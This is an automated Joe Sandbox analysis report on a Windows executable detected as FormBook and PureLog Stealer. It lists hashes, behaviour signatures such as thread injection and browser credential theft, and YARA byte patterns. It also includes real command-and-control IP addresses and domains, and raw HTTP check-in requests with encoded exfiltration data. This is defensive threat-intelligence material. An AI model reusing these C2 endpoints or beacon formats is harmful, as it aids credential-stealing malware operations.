Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MR-239-1599-A.scr.exe

Overview

General Information

Sample name:MR-239-1599-A.scr.exe
Analysis ID:1438436
MD5:f53a5b00eaa86439c9bf502a7550f48a
SHA1:e4f80447b09e17553bcbd8925662c9d1d3560ec7
SHA256:f82f959fe8660a9975cbd0255ba069507af5bdb24dc88b47b275ff98fbae0afb
Tags:exeFormbook
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • MR-239-1599-A.scr.exe (PID: 7400 cmdline: "C:\Users\user\Desktop\MR-239-1599-A.scr.exe" MD5: F53A5B00EAA86439C9BF502A7550F48A)
    • MR-239-1599-A.scr.exe (PID: 7548 cmdline: "C:\Users\user\Desktop\MR-239-1599-A.scr.exe" MD5: F53A5B00EAA86439C9BF502A7550F48A)
    • MR-239-1599-A.scr.exe (PID: 7556 cmdline: "C:\Users\user\Desktop\MR-239-1599-A.scr.exe" MD5: F53A5B00EAA86439C9BF502A7550F48A)
      • DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe (PID: 4488 cmdline: "C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • replace.exe (PID: 7920 cmdline: "C:\Windows\SysWOW64\replace.exe" MD5: A7F2E9DD9DE1396B1250F413DA2F6C08)
          • DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe (PID: 4500 cmdline: "C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8184 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.4094770900.0000000004C90000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000009.00000002.4094770900.0000000004C90000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x655b7:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x4eb86:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000006.00000002.4093386507.00000000031B0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.4093386507.00000000031B0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a8f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13ebf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000000.00000002.1654874999.0000000007620000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        Click to see the 14 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.MR-239-1599-A.scr.exe.7620000.6.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          0.2.MR-239-1599-A.scr.exe.2d8fe28.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            0.2.MR-239-1599-A.scr.exe.2d8fe28.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.MR-239-1599-A.scr.exe.7620000.6.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                3.2.MR-239-1599-A.scr.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                  Click to see the 3 entries

                  Sigma Signatures

                  No Sigma rule has matched

                  Snort Signatures

                  Timestamp:05/08/24-18:23:04.241190
                  SID:2855465
                  Source Port:49772
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/08/24-18:21:29.283237
                  SID:2855465
                  Source Port:49752
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/08/24-18:20:40.991637
                  SID:2855465
                  Source Port:49743
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/08/24-18:21:13.889976
                  SID:2855465
                  Source Port:49748
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/08/24-18:22:25.343188
                  SID:2855465
                  Source Port:49764
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/08/24-18:22:48.893765
                  SID:2855465
                  Source Port:49768
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/08/24-18:22:02.183176
                  SID:2855465
                  Source Port:49760
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/08/24-18:23:53.287883
                  SID:2855465
                  Source Port:49780
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/08/24-18:23:28.557719
                  SID:2855465
                  Source Port:49776
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Multi AV Scanner detection for submitted file
                  Source: MR-239-1599-A.scr.exeReversingLabs: Detection: 50%
                  Yara detected FormBook
                  Source: Yara matchFile source: 3.2.MR-239-1599-A.scr.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.MR-239-1599-A.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000002.4094770900.0000000004C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4093386507.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1945723633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4093292133.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1946088682.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1948359702.0000000003660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.4092996752.0000000004050000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  Source: MR-239-1599-A.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: MR-239-1599-A.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: replace.pdb source: MR-239-1599-A.scr.exe, 00000003.00000002.1946216464.0000000001067000.00000004.00000020.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000005.00000002.4092546674.00000000007B8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: replace.pdbGCTL source: MR-239-1599-A.scr.exe, 00000003.00000002.1946216464.0000000001067000.00000004.00000020.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000005.00000002.4092546674.00000000007B8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000005.00000002.4092277586.00000000004CE000.00000002.00000001.01000000.0000000C.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000000.2033012874.00000000004CE000.00000002.00000001.01000000.0000000C.sdmp
                  Source: Binary string: wntdll.pdbUGP source: MR-239-1599-A.scr.exe, 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000006.00000003.1946021907.0000000003074000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000006.00000003.1948153296.000000000322E000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: MR-239-1599-A.scr.exe, MR-239-1599-A.scr.exe, 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, replace.exe, replace.exe, 00000006.00000003.1946021907.0000000003074000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000006.00000003.1948153296.000000000322E000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: PIqH.pdb source: MR-239-1599-A.scr.exe
                  Source: Binary string: PIqH.pdbSHA256\;<D source: MR-239-1599-A.scr.exe
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_02C1BC00 FindFirstFileW,FindNextFileW,FindClose,6_2_02C1BC00
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 4x nop then xor eax, eax6_2_02C09460
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 4x nop then pop edi6_2_02C1210D

                  Networking

                  barindex
                  Snort IDS alert for network traffic
                  Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49743 -> 79.98.25.1:80
                  Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49748 -> 64.190.62.22:80
                  Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49752 -> 217.76.128.34:80
                  Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49760 -> 178.211.137.59:80
                  Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49764 -> 203.161.46.103:80
                  Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49768 -> 162.240.81.18:80
                  Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49772 -> 103.93.125.69:80
                  Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49776 -> 3.73.27.108:80
                  Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49780 -> 91.195.240.19:80
                  Performs DNS queries to domains with low reputation
                  Source: DNS query: www.www60270.xyz
                  Source: Joe Sandbox ViewIP Address: 162.240.81.18 162.240.81.18
                  Source: Joe Sandbox ViewIP Address: 79.98.25.1 79.98.25.1
                  Source: Joe Sandbox ViewIP Address: 79.98.25.1 79.98.25.1
                  Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                  Source: Joe Sandbox ViewASN Name: DNC-ASDimensionNetworkCommunicationLimitedHK DNC-ASDimensionNetworkCommunicationLimitedHK
                  Source: Joe Sandbox ViewASN Name: RACKRAYUABRakrejusLT RACKRAYUABRakrejusLT
                  Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /aleu/?jn4lNb=ok/gmcxpcerYYESV9LVelGsDrZokr4IbVWXcVokfXup7b9fdD39fjj06OXsQXJEXHKhiFziBALjD8i0StjfBb+96LAD/3UXNvlvrkMKLP/jNG9hi36bWzAk=&jvudu=jXz4lVThP2GL4N HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.maxiwalls.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                  Source: global trafficHTTP traffic detected: GET /aleu/?jn4lNb=jXFvQTK4oWsNW5HZJ/0gKTQct2QKO2STTlZ8jbhw/9BHTw5yM7uncTfMOk5Q960TVKfivgiXqRpaWw5bUpeZkV7I+j781KbGhsSlxE46GWITw0n47D4H34I=&jvudu=jXz4lVThP2GL4N HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.paydayloans3.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                  Source: global trafficHTTP traffic detected: GET /aleu/?jn4lNb=heiUU9lLv45IJG5VBKLzBQ/QU5pXOEZ122KPvL/NNDCzNkInOevyA08bejzsewnbLAKBPzZGyeY+skKwUgloq+HQclTA5c3JDTwCxVF3w8TOe3DJCoRyHmQ=&jvudu=jXz4lVThP2GL4N HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.colchondealquiler.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                  Source: global trafficHTTP traffic detected: GET /aleu/?jn4lNb=N0v49flUUQfEWOo8G070d+LLia1Jclps7J9ivEb+Xo+Q/nq/YMDO//KjhQmhbqKlUVaao73nPs1gVWG10w4sO7KdYvAVPIXxSY0kCkfcGUlYm8H/tBR+N9A=&jvudu=jXz4lVThP2GL4N HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.skibinscy-finanse.plConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                  Source: global trafficHTTP traffic detected: GET /aleu/?jn4lNb=1EzsQVnX0vVrGxBbRnBPuNOP8Hn1gSvJWEXTYZCw6Y45y9QSTO9z6ggEQaWzMFMNeg7sTl3Zf11WKrZHAcHpU5xNXvMTIPZOnLFq5OOndh66TdA/sgsdPCY=&jvudu=jXz4lVThP2GL4N HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.fairmarty.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                  Source: global trafficHTTP traffic detected: GET /aleu/?jn4lNb=mEhw182mTcvL4X7VmCJbLa0KRk630JMb/q8jOnfIToCvkLfDcLYfug01ytzddJhX/lijb8hpDT2F8KzL6RC5Fv1lORSZ/ddJgsC5cmTGFrP+D2MWmLQXjoE=&jvudu=jXz4lVThP2GL4N HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.aprovapapafox.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                  Source: global trafficHTTP traffic detected: GET /aleu/?jn4lNb=/mfxaTJBOgt3JDZn0BatbUHTEszIrcd1tbJm5eA1/p+8DdahBUuKuoWdPETp4wIg5O58ph7A0hS6+wjYiiGEuNl9oe0KYtPyQihSGvBT9JqjuFq9ou3hQwM=&jvudu=jXz4lVThP2GL4N HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.83634.cnConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                  Source: global trafficHTTP traffic detected: GET /aleu/?jn4lNb=qJYbYwaLgLDJAMSEQ5QgE4656+lZvARVMq73qeoAA4dzyQoAh+hTVoh+ah/e183iVnKHGTOXkcX7G8t3YRyjUavOuE9Ld2m4gF80zlDT2iLkYInMKGRZjmA=&jvudu=jXz4lVThP2GL4N HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.valentinaetommaso.itConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                  Source: global trafficHTTP traffic detected: GET /aleu/?jn4lNb=Fsk+9Ugrf6MFs9mf9XEpMImSOUY5iiqQsqu2PahB1CBPiKPkA/hmNXSF9ivWSGs/4CiX0i2cy0l6l8SVSxzUGzAeffoJWz8ACYHJmD8/KtCE1mdCsvc/NZo=&jvudu=jXz4lVThP2GL4N HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.solesense.proConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                  Source: global trafficDNS traffic detected: DNS query: www.maxiwalls.com
                  Source: global trafficDNS traffic detected: DNS query: www.choosejungmann.com
                  Source: global trafficDNS traffic detected: DNS query: www.paydayloans3.shop
                  Source: global trafficDNS traffic detected: DNS query: www.colchondealquiler.com
                  Source: global trafficDNS traffic detected: DNS query: www.www60270.xyz
                  Source: global trafficDNS traffic detected: DNS query: www.skibinscy-finanse.pl
                  Source: global trafficDNS traffic detected: DNS query: www.avoshield.com
                  Source: global trafficDNS traffic detected: DNS query: www.fairmarty.top
                  Source: global trafficDNS traffic detected: DNS query: www.theertyuiergthjk.homes
                  Source: global trafficDNS traffic detected: DNS query: www.aprovapapafox.com
                  Source: global trafficDNS traffic detected: DNS query: www.83634.cn
                  Source: global trafficDNS traffic detected: DNS query: www.polhi.lol
                  Source: global trafficDNS traffic detected: DNS query: www.valentinaetommaso.it
                  Source: global trafficDNS traffic detected: DNS query: www.toyzonetshirts.com
                  Source: global trafficDNS traffic detected: DNS query: www.solesense.pro
                  Source: global trafficDNS traffic detected: DNS query: www.onitsuka-ksa.com
                  Source: unknownHTTP traffic detected: POST /aleu/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateHost: www.paydayloans3.shopOrigin: http://www.paydayloans3.shopContent-Type: application/x-www-form-urlencodedContent-Length: 203Cache-Control: max-age=0Connection: closeReferer: http://www.paydayloans3.shop/aleu/User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36Data Raw: 6a 6e 34 6c 4e 62 3d 75 56 74 50 54 6a 69 4f 39 6b 59 30 4a 72 62 59 4c 70 74 65 4c 56 6b 63 69 46 55 64 65 54 43 57 66 6e 5a 72 71 72 70 32 34 4e 74 30 66 54 46 47 4e 4c 66 55 64 32 6e 57 4a 56 73 59 37 4c 56 6d 53 59 33 67 32 41 57 4a 33 52 39 2b 45 6e 39 36 50 34 48 4c 77 42 33 4c 32 67 58 70 32 71 48 48 76 70 57 49 6b 52 55 59 51 45 51 70 70 47 2b 42 2f 51 73 47 70 37 79 30 46 57 77 4d 64 4b 68 34 45 2b 50 2b 6a 50 53 36 45 43 66 6c 4c 43 6f 45 35 2b 54 41 47 74 59 65 42 75 35 37 62 79 38 43 59 35 41 78 61 64 66 4d 54 7a 6e 48 31 58 50 64 4d 74 33 36 57 37 32 77 33 63 6c 6b 36 57 45 31 41 67 3d 3d Data Ascii: jn4lNb=uVtPTjiO9kY0JrbYLpteLVkciFUdeTCWfnZrqrp24Nt0fTFGNLfUd2nWJVsY7LVmSY3g2AWJ3R9+En96P4HLwB3L2gXp2qHHvpWIkRUYQEQppG+B/QsGp7y0FWwMdKh4E+P+jPS6ECflLCoE5+TAGtYeBu57by8CY5AxadfMTznH1XPdMt36W72w3clk6WE1Ag==
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 16:21:20 GMTServer: ApacheX-ServerIndex: llim605Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 65 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 61 6c 71 75 69 6c 65 72 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 24 52 45 47 49 53 54 52 41 4e 54 31 20 24 52 45 47 49 53 54 52 41 4e 54 32 20 24 52 45 47 49 53 54 52 41 4e 54 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 73 79 73 2e 65 73 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 73 65 67 75 69 6d 69 65 6e 74 6f 22 3e 3c 2f 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 45 73 74 61 20 65 73 20 6c 61 20 70 26 61 61 63 75 74 65 3b 67 69 6e 61 20 64 65 3a 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 6
